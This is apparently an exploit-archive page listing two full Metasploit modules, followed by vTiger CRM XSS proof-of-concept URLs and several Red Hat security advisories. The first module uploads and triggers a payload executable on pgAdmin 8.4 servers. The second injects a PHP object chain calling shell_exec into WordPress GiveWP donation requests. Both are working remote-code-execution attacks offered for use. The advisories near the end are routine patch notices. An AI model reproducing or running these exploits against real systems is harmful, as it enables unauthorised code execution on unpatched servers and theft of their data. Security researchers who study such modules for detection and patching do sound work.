pgAdmin versions 8.4 and below are affected by a remote code execution vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pgAdmin Binary Path API RCE',        'Description' => %q{          pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)          vulnerability through the validate binary path API. This vulnerability          allows attackers to execute arbitrary code on the server hosting PGAdmin,          posing a severe risk to the database management system's integrity and the security of the underlying data.          Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.        },        'License' => MSF_LICENSE,        'Author' => [          'M.Selim Karahan', # metasploit module          'Mustafa Mutlu', # lab prep. and QA          'Ayoub Mokhtar' # vulnerability discovery and write up        ],        'References' => [          [ 'CVE', '2024-3116'],          [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'],          [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116']        ],        'Platform' => ['windows'],        'Arch' => ARCH_X64,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2024-03-28',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'Reliability' => [ REPEATABLE_SESSION, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]        }      )    )    register_options(      [        Opt::RPORT(8000),        OptString.new('USERNAME', [ false, 'User to login with', '']),        OptString.new('PASSWORD', [ false, 'Password to login with', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])      ]    )  end  def check    version = get_version    return CheckCode::Unknown('Unable to determine the target version') unless version    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')    CheckCode::Vulnerable("pgAdmin version #{version} is affected")  end  def set_csrf_token_from_login_page(res)    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/      @csrf_token = Regexp.last_match(1)      # at some point between v7.0 and 7.7 the token format changed    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)      @csrf_token = element['value']    end  end  def set_csrf_token_from_config(res)    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/      @csrf_token = Regexp.last_match(1)      # at some point between v7.0 and 7.7 the token format changed    else      @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first    end  end  def auth_required?    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)    if res&.code == 302 && res.headers['Location']['login']      true    elsif res&.code == 302 && res.headers['Location']['browser']      false    end  end  def on_windows?    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)    if res&.code == 200      platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first      return platform == 'win32'    end  end  def get_version    if auth_required?      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)    else      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)    end    html_document = res&.get_html_document    return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }    return unless versioned_link    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")  end  def csrf_token    return @csrf_token if @csrf_token    if auth_required?      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)      set_csrf_token_from_login_page(res)    else      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)      set_csrf_token_from_config(res)    end    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token    @csrf_token  end  def exploit    if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?)      fail_with(Failure::BadConfig, 'The application requires authentication, please provide valid credentials')    end    if auth_required?      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'authenticate/login'),        'method' => 'POST',        'keep_cookies' => true,        'vars_post' => {          'csrf_token' => csrf_token,          'email' => datastore['USERNAME'],          'password' => datastore['PASSWORD'],          'language' => 'en',          'internal_button' => 'Login'        }      })      unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')        fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')      end      print_status('Successfully authenticated to pgAdmin')    end    unless on_windows?      fail_with(Failure::BadConfig, 'This exploit is specific to Windows targets!')    end    file_name = 'pg_restore.exe'    file_manager_upload_and_trigger(file_name, generate_payload_exe)  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  end  # file manager code is copied from pgadmin_session_deserialization module  def file_manager_init    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'file_manager/init'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => {        'dialog_type' => 'storage_dialog',        'supported_types' => ['sql', 'csv', 'json', '*'],        'dialog_title' => 'Storage Manager'      }.to_json    })    unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir'))      fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder')    end    return trans_id, home_folder  end  def file_manager_upload_and_trigger(file_path, file_contents)    trans_id, home_folder = file_manager_init    form = Rex::MIME::Message.new    form.add_part(      file_contents,      'application/octet-stream',      'binary',      "form-data; name=\"newfile\"; filename=\"#{file_path}\""    )    form.add_part('add', nil, nil, 'form-data; name="mode"')    form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"')    form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form.bound}",      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => form.to_s    })    unless res&.code == 200 && res.get_json_document['success'] == 1      fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')    end    upload_path = res.get_json_document.dig('data', 'result', 'Name')    register_file_for_cleanup(upload_path)    print_status("Payload uploaded to: #{upload_path}")    send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => {        'utility_path' => upload_path[0..upload_path.size - 16]      }.to_json    })    true  endend

pgAdmin 8.4 Remote Code Execution

The GiveWP Donation plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP object injection (POI) flaw granting an unauthenticated attacker arbitrary code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GiveWP Unauthenticated Donation Process Exploit',        'Description' => %q{          The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.        },        'License' => MSF_LICENSE,        'Author' => [          'Villu Orav',         # Initial Discovery          'EQSTSeminar',        # Proof of Concept          'Julien Ahrens',      # Vulnerability Analysis          'Valentin Lobstein'   # Metasploit Module        ],        'References' => [          ['CVE', '2024-5932'],          ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],          ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],          ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']        ],        'DisclosureDate' => '2024-08-25',        'Platform' => %w[unix linux win],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix/Linux Command Shell',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell',            {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )      )  end  def check    return CheckCode::Unknown unless wordpress_and_online?    print_status("WordPress Version: #{wordpress_version}") if wordpress_version    check_code = check_plugin_version_from_readme('give', '3.14.2')    return CheckCode::Safe unless check_code.code == 'appears'    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")    CheckCode::Appears  end  def exploit    forms = fetch_form_list    fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?    selected_form = forms.sample    valid_form = retrieve_and_analyze_form(selected_form['id'])    return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form    print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")    send_exploit_request(      valid_form['give_form_id'],      valid_form['give_form_hash'],      valid_form['give_price_id'],      valid_form['give_amount']    )  end  def fetch_form_list    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'data' => 'action=give_form_search'    )    return print_error('Failed to retrieve form list.') unless res&.code == 200    forms = JSON.parse(res.body)    form_ids = forms.map { |form| form['id'] }.sort    print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")    forms  end  def retrieve_and_analyze_form(form_id)    form_res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }    )    return unless form_res&.code == 200    form_data = JSON.parse(form_res.body)    give_form_id = form_id    give_form_hash = form_data['data']    give_price_id = '0'    give_amount = '$10.00'    # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.    return unless give_form_hash    {      'give_form_id' => give_form_id,      'give_form_hash' => give_form_hash,      'give_price_id' => give_price_id,      'give_amount' => give_amount    }  end  def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)    final_payload = format(      'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \      'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \      's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \      'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \      's:10:"shell_exec";s:12:"\\0*\\0generator";' \      'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \      's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \      's:13:"\\0*\\0maxRetries";i:10;}}}}}}',      length: payload.encoded.length,      encoded: payload.encoded    )    data = {      'give-form-id' => give_form_id,      'give-form-hash' => give_form_hash,      'give-price-id' => give_price_id,      'give-amount' => give_amount,      'give_first' => Faker::Name.first_name,      'give_last' => Faker::Name.last_name,      'give_email' => Faker::Internet.email,      'give_title' => final_payload,      'give-gateway' => 'offline',      'action' => 'give_process_donation'    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'data' => URI.encode_www_form(data)    }, 0)  endend

WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution

vTiger CRM version 7.4.0 suffers from multiple reflective cross site scripting vulnerabilities.

    [CVE-ID]:CVE-2024-44778------------------------------------------[Suggested description]:A reflected cross-site scripting (XSS) vulnerability in the parent parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.------------------------------------------[Additional Information]PoC:https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22------------------------------------------[Vulnerability Type]:Cross Site Scripting (XSS)------------------------------------------[Vendor of Product]:vTiger------------------------------------------[Affected Product Code Base]:vTiger CRM - 7.4.0.------------------------------------------[Affected Component]:The parent parameter of vTiger CRM 7.4.0 Index page------------------------------------------[Attack Type]:Remote------------------------------------------[CVE Impact Other]:Run Arbitrary Javascript code------------------------------------------[Attack Vectors]:Crafted URL------------------------------------------[Has vendor confirmed or acknowledged the vulnerability?]:true------------------------------------------[Discoverer]:Marco Nappi------------------------------------------[Reference]http://vtiger.comhttps://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22[CVE-ID]:CVE-2024-44779------------------------------------------[Suggested description]A reflected cross-site scripting (XSS) vulnerability in the viewname parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.------------------------------------------[Additional Information]:PoC:https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd'+onpointerdown=alert()+alt=------------------------------------------[Vulnerability Type]Cross Site Scripting (XSS)------------------------------------------[Vendor of Product]:vTiger------------------------------------------[Affected Product Code Base]:vTiger CRM - 7.4.0.------------------------------------------[Affected Component]:The "viewname" parameter of vTiger CRM 7.4.0 Index page .------------------------------------------[Attack Type]:Remote------------------------------------------[CVE Impact Other]:Run Arbitrary JS code------------------------------------------[Attack Vectors]Crafted URL------------------------------------------[Has vendor confirmed or acknowledged the vulnerability?]:true------------------------------------------[Discoverer]:Marco Nappi------------------------------------------[Reference]http://vtiger.comhttps://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd[CVE-ID]:CVE-2024-44777------------------------------------------[Suggested description]A reflected cross-site scripting (XSS) vulnerability in the tag parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.------------------------------------------[Additional Information]PoC:https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22------------------------------------------[Vulnerability Type]:Cross Site Scripting (XSS)------------------------------------------[Vendor of Product]:vTiger------------------------------------------[Affected Product Code Base]:vTiger CRM - 7.4.0.------------------------------------------[Affected Component]The "tag" parameter of vTiger CRM 7.4.0 Index page------------------------------------------[Attack Type]:Remote------------------------------------------[CVE Impact Other]Run Arbitrary Javascript code------------------------------------------[Attack Vectors]:Crafted URL------------------------------------------[Has vendor confirmed or acknowledged the vulnerability?]:true------------------------------------------[Discoverer]:Marco Nappi------------------------------------------[Reference]http://vtiger.comhttps://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22

vTiger CRM 7.4.0 Cross Site Scripting

Red Hat Security Advisory 2024-6033-03 - An update for openldap is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a null pointer vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6033.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: openldap security updateAdvisory ID:        RHSA-2024:6033-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6033Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2023-2953====================================================================Summary: An update for openldap is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenLDAP is an open-source suite of Lightweight Directory Access Protocol (LDAP) applications and development tools. LDAP is a set of protocols used to access and maintain distributed directory information services over an IP network. Security Fix(es):* openldap: null pointer dereference in  ber_memalloc_x  function (CVE-2023-2953)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-2953References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2210651

Red Hat Security Advisory 2024-6033-03

Red Hat Security Advisory 2024-6030-03 - An update for python3 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6030.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: python3 security updateAdvisory ID:        RHSA-2024:6030-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6030Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4032====================================================================Summary: An update for python3 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4032References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2292921

Red Hat Security Advisory 2024-6030-03

Red Hat Security Advisory 2024-6028-03 - An update for git is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6028.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git security updateAdvisory ID:        RHSA-2024:6028-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6028Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-32002====================================================================Summary: An update for git is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32002References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2280421https://bugzilla.redhat.com/show_bug.cgi?id=2280428

Red Hat Security Advisory 2024-6028-03

Red Hat Security Advisory 2024-6027-03 - An update for git is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6027.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git security updateAdvisory ID:        RHSA-2024:6027-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6027Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-32002====================================================================Summary: An update for git is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32002References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2280421https://bugzilla.redhat.com/show_bug.cgi?id=2280428

Red Hat Security Advisory 2024-6027-03

Red Hat Security Advisory 2024-6020-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6020.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:6020-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6020Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4317====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat EnterpriseLinux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL relation replacement during pg_dump executes arbitrary SQL (CVE-2024-7348)* postgresql: PostgreSQL pg_stats_ext and pg_stats_ext_exprs lack authorization checks (CVE-2024-4317)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4317References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279935

Red Hat Security Advisory 2024-6020-03

Red Hat Security Advisory 2024-6018-03 - An update for the postgresql:13 module is now available for ed Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6018.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:13 security updateAdvisory ID:        RHSA-2024:6018-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6018Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-7348====================================================================Summary: An update for the postgresql:13 module is now available for ed Hat EnterpriseLinux 8.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL relation replacement during pg_dump executes arbitrary SQL (CVE-2024-7348)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-7348References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-6018-03

Red Hat Security Advisory 2024-6001-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6001.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:6001-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6001Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4317====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL relation replacement during pg_dump executes arbitrary SQL (CVE-2024-7348)* postgresql: PostgreSQL pg_stats_ext and pg_stats_ext_exprs lack authorization checks (CVE-2024-4317)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4317References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279935

Tag

#js